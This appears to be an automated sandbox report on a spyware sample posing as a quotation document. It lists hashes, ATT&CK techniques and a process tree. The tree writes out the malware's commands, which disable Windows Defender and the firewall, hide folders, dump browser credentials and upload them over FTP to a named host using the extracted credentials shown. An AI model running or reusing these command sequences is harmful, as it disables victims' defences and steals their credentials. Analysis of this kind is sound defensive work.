dff0bf7c85f01cf94f21c7bdd224fe0b3d73dcad9cb38fa40eef4685c9bc63ab

Analysis

max time kernel
131s
max time network
136s
platform
windows7_x64
resource
win7
submitted
09-07-2020 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ Request For Quotation.doc. .exe
Size

1.0MB
MD5

087a1ecc3d720b786d8cc8544bc469ed
SHA1

721623d6904a1c9e8168c3f104840490b5b52491
SHA256

dff0bf7c85f01cf94f21c7bdd224fe0b3d73dcad9cb38fa40eef4685c9bc63ab
SHA512

ae12605396dc568f7da9d9fdfb5518bcedea190c0c7f3d39d9773c76fee41bc5f0daf966ca31bba6acccdc5be867e64a30c6c1deed2425713db1226c196d5981

Score

10^/10

evasion persistence spyware

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
ftps4.us.freehostia.com
Port:
21
Username:
jumshi
Password:
winniebobo

Signatures

Executes dropped EXE 5 IoCs

pid	Process
1164	adobepdf.exe
1576	adobedf.exe
1988	ancp.exe
1936	ancp.exe
1944	Areada.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1380	attrib.exe
1596	attrib.exe

Suspicious use of WriteProcessMemory 111 IoCs

description	pid	Process	procid_target
PID 1164 wrote to memory of 1288	1164	RFQ Request For Quotation.doc. .exe	24
PID 1164 wrote to memory of 1288	1164	RFQ Request For Quotation.doc. .exe	24
PID 1164 wrote to memory of 1288	1164	RFQ Request For Quotation.doc. .exe	24
PID 1164 wrote to memory of 1288	1164	RFQ Request For Quotation.doc. .exe	24
PID 1288 wrote to memory of 1512	1288	WScript.exe	25
PID 1288 wrote to memory of 1512	1288	WScript.exe	25
PID 1288 wrote to memory of 1512	1288	WScript.exe	25
PID 1288 wrote to memory of 1512	1288	WScript.exe	25
PID 1512 wrote to memory of 1632	1512	cmd.exe	27
PID 1512 wrote to memory of 1632	1512	cmd.exe	27
PID 1512 wrote to memory of 1632	1512	cmd.exe	27
PID 1512 wrote to memory of 1632	1512	cmd.exe	27
PID 1632 wrote to memory of 796	1632	net.exe	28
PID 1632 wrote to memory of 796	1632	net.exe	28
PID 1632 wrote to memory of 796	1632	net.exe	28
PID 1632 wrote to memory of 796	1632	net.exe	28
PID 1512 wrote to memory of 1120	1512	cmd.exe	29
PID 1512 wrote to memory of 1120	1512	cmd.exe	29
PID 1512 wrote to memory of 1120	1512	cmd.exe	29
PID 1512 wrote to memory of 1120	1512	cmd.exe	29
PID 1120 wrote to memory of 1516	1120	WScript.exe	30
PID 1120 wrote to memory of 1516	1120	WScript.exe	30
PID 1120 wrote to memory of 1516	1120	WScript.exe	30
PID 1120 wrote to memory of 1516	1120	WScript.exe	30
PID 1516 wrote to memory of 1380	1516	cmd.exe	32
PID 1516 wrote to memory of 1380	1516	cmd.exe	32
PID 1516 wrote to memory of 1380	1516	cmd.exe	32
PID 1516 wrote to memory of 1380	1516	cmd.exe	32
PID 1516 wrote to memory of 1820	1516	cmd.exe	33
PID 1516 wrote to memory of 1820	1516	cmd.exe	33
PID 1516 wrote to memory of 1820	1516	cmd.exe	33
PID 1516 wrote to memory of 1820	1516	cmd.exe	33
PID 1516 wrote to memory of 1368	1516	cmd.exe	34
PID 1516 wrote to memory of 1368	1516	cmd.exe	34
PID 1516 wrote to memory of 1368	1516	cmd.exe	34
PID 1516 wrote to memory of 1368	1516	cmd.exe	34
PID 1368 wrote to memory of 1596	1368	cmd.exe	36
PID 1368 wrote to memory of 1596	1368	cmd.exe	36
PID 1368 wrote to memory of 1596	1368	cmd.exe	36
PID 1368 wrote to memory of 1596	1368	cmd.exe	36
PID 1368 wrote to memory of 1560	1368	cmd.exe	37
PID 1368 wrote to memory of 1560	1368	cmd.exe	37
PID 1368 wrote to memory of 1560	1368	cmd.exe	37
PID 1368 wrote to memory of 1560	1368	cmd.exe	37
PID 1368 wrote to memory of 1892	1368	cmd.exe	38
PID 1368 wrote to memory of 1892	1368	cmd.exe	38
PID 1368 wrote to memory of 1892	1368	cmd.exe	38
PID 1368 wrote to memory of 1892	1368	cmd.exe	38
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1924	1368	cmd.exe	39
PID 1368 wrote to memory of 1948	1368	cmd.exe	41
PID 1368 wrote to memory of 1948	1368	cmd.exe	41
PID 1368 wrote to memory of 1948	1368	cmd.exe	41
PID 1368 wrote to memory of 1948	1368	cmd.exe	41
PID 1368 wrote to memory of 1032	1368	cmd.exe	42
PID 1368 wrote to memory of 1032	1368	cmd.exe	42
PID 1368 wrote to memory of 1032	1368	cmd.exe	42
PID 1368 wrote to memory of 1032	1368	cmd.exe	42
PID 1368 wrote to memory of 1088	1368	cmd.exe	43
PID 1368 wrote to memory of 1088	1368	cmd.exe	43
PID 1368 wrote to memory of 1088	1368	cmd.exe	43
PID 1368 wrote to memory of 1088	1368	cmd.exe	43
PID 1368 wrote to memory of 1332	1368	cmd.exe	44
PID 1368 wrote to memory of 1332	1368	cmd.exe	44
PID 1368 wrote to memory of 1332	1368	cmd.exe	44
PID 1368 wrote to memory of 1332	1368	cmd.exe	44
PID 1368 wrote to memory of 760	1368	cmd.exe	45
PID 1368 wrote to memory of 760	1368	cmd.exe	45
PID 1368 wrote to memory of 760	1368	cmd.exe	45
PID 1368 wrote to memory of 760	1368	cmd.exe	45
PID 1368 wrote to memory of 1524	1368	cmd.exe	46
PID 1368 wrote to memory of 1524	1368	cmd.exe	46
PID 1368 wrote to memory of 1524	1368	cmd.exe	46
PID 1368 wrote to memory of 1524	1368	cmd.exe	46
PID 1368 wrote to memory of 1840	1368	cmd.exe	47
PID 1368 wrote to memory of 1840	1368	cmd.exe	47
PID 1368 wrote to memory of 1840	1368	cmd.exe	47
PID 1368 wrote to memory of 1840	1368	cmd.exe	47
PID 1368 wrote to memory of 1080	1368	cmd.exe	49
PID 1368 wrote to memory of 1080	1368	cmd.exe	49
PID 1368 wrote to memory of 1080	1368	cmd.exe	49
PID 1368 wrote to memory of 1080	1368	cmd.exe	49
PID 1368 wrote to memory of 316	1368	cmd.exe	50
PID 1368 wrote to memory of 316	1368	cmd.exe	50
PID 1368 wrote to memory of 316	1368	cmd.exe	50
PID 1368 wrote to memory of 316	1368	cmd.exe	50
PID 1368 wrote to memory of 1164	1368	cmd.exe	51
PID 1368 wrote to memory of 1164	1368	cmd.exe	51
PID 1368 wrote to memory of 1164	1368	cmd.exe	51
PID 1368 wrote to memory of 1164	1368	cmd.exe	51
PID 1368 wrote to memory of 1576	1368	cmd.exe	52
PID 1368 wrote to memory of 1576	1368	cmd.exe	52
PID 1368 wrote to memory of 1576	1368	cmd.exe	52
PID 1368 wrote to memory of 1576	1368	cmd.exe	52
PID 1368 wrote to memory of 1988	1368	cmd.exe	53
PID 1368 wrote to memory of 1988	1368	cmd.exe	53
PID 1368 wrote to memory of 1988	1368	cmd.exe	53
PID 1368 wrote to memory of 1988	1368	cmd.exe	53
PID 1368 wrote to memory of 1936	1368	cmd.exe	54
PID 1368 wrote to memory of 1936	1368	cmd.exe	54
PID 1368 wrote to memory of 1936	1368	cmd.exe	54
PID 1368 wrote to memory of 1936	1368	cmd.exe	54
PID 1368 wrote to memory of 1944	1368	cmd.exe	55
PID 1368 wrote to memory of 1944	1368	cmd.exe	55
PID 1368 wrote to memory of 1944	1368	cmd.exe	55
PID 1368 wrote to memory of 1944	1368	cmd.exe	55

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1924	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1924	msiexec.exe
Token: SeRestorePrivilege	1880	msiexec.exe
Token: SeTakeOwnershipPrivilege	1880	msiexec.exe
Token: SeSecurityPrivilege	1880	msiexec.exe
Token: SeCreateTokenPrivilege	1924	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1924	msiexec.exe
Token: SeLockMemoryPrivilege	1924	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1924	msiexec.exe
Token: SeMachineAccountPrivilege	1924	msiexec.exe
Token: SeTcbPrivilege	1924	msiexec.exe
Token: SeSecurityPrivilege	1924	msiexec.exe
Token: SeTakeOwnershipPrivilege	1924	msiexec.exe
Token: SeLoadDriverPrivilege	1924	msiexec.exe
Token: SeSystemProfilePrivilege	1924	msiexec.exe
Token: SeSystemtimePrivilege	1924	msiexec.exe
Token: SeProfSingleProcessPrivilege	1924	msiexec.exe
Token: SeIncBasePriorityPrivilege	1924	msiexec.exe
Token: SeCreatePagefilePrivilege	1924	msiexec.exe
Token: SeCreatePermanentPrivilege	1924	msiexec.exe
Token: SeBackupPrivilege	1924	msiexec.exe
Token: SeRestorePrivilege	1924	msiexec.exe
Token: SeShutdownPrivilege	1924	msiexec.exe
Token: SeDebugPrivilege	1924	msiexec.exe
Token: SeAuditPrivilege	1924	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1924	msiexec.exe
Token: SeChangeNotifyPrivilege	1924	msiexec.exe
Token: SeRemoteShutdownPrivilege	1924	msiexec.exe
Token: SeUndockPrivilege	1924	msiexec.exe
Token: SeSyncAgentPrivilege	1924	msiexec.exe
Token: SeEnableDelegationPrivilege	1924	msiexec.exe
Token: SeManageVolumePrivilege	1924	msiexec.exe
Token: SeImpersonatePrivilege	1924	msiexec.exe
Token: SeCreateGlobalPrivilege	1924	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1872	DllHost.exe

Loads dropped DLL 9 IoCs

pid	Process
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe
1368	cmd.exe

Runs net.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Disabling Security Tools
T1089

Service Stop
T1489
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1164	adobepdf.exe
1164	adobepdf.exe

Modifies service 2 TTPs 45 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

C:\Users\Admin\AppData\Local\Temp\RFQ Request For Quotation.doc. .exe
"C:\Users\Admin\AppData\Local\Temp\RFQ Request For Quotation.doc. .exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\Adobe.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\Adobe03.bat" /quiet /norestart"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Windows\SysWOW64\net.exe
      NET FILE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 FILE
        5⤵
        
        PID:796
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\adobel.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1120
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low\adobe01.bat" /quiet /norestart"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1516
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe INC\AadobeRead\"
        6⤵
        Views/modifies file attributes
        
        PID:1380
      - C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\"
        6⤵
        Enumerates system info in registry
        
        PID:1820
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adob02.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        Loads dropped DLL
        
        PID:1368
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Local\Adobe\Pdf\low"
        7⤵
        Views/modifies file attributes
        
        PID:1596
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        7⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        7⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec /uninstall windowsdefender.msi /quiet /log uninstall.log
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set notifications mode=DISABLE
        7⤵
        Modifies service
        
        PID:1948
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        7⤵
        Modifies service
        
        PID:1032
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set domainprofile state off
        7⤵
        Modifies service
        
        PID:1088
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        7⤵
        Modifies service
        
        PID:1332
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        7⤵
        Modifies service
        
        PID:760
        
        C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        7⤵
        Modifies service
        
        PID:1524
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set notifications mode = disable profile = all
        7⤵
        Modifies service
        
        PID:1840
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set publicprofile state off
        7⤵
        Modifies service
        
        PID:1080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set privateprofile state off
        7⤵
        Modifies service
        
        PID:316
        
        C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adobepdf.exe
        
        adobepdf.exe /stext 033.033
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1164
        
        C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\adobedf.exe
        
        adobedf.exe /stext 022.022
        7⤵
        Executes dropped EXE
        
        PID:1576
        
        C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\ancp.exe
        
        ancp -u jumshi -p winniebobo -m -F -R ftps4.us.freehostia.com /ALOG003 *.192
        7⤵
        Executes dropped EXE
        
        PID:1988
        
        C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\ancp.exe
        
        ancp -u jumshi -p winniebobo -m -F -R ftps4.us.freehostia.com /ALOG003 *.193
        7⤵
        Executes dropped EXE
        
        PID:1936
        
        C:\Users\Admin\AppData\Roaming\AdobeD\Adobe Inc\AadobeRead\Areada.exe
        
        Areada 5359
        7⤵
        Executes dropped EXE
        
        PID:1944

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- Suspicious use of FindShellTrayWindow
PID:1872

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1120-20-0x0000000002590000-0x0000000002594000-memory.dmp

Filesize
16KB

Download
memory/1288-21-0x0000000002670000-0x0000000002674000-memory.dmp

Filesize
16KB

Download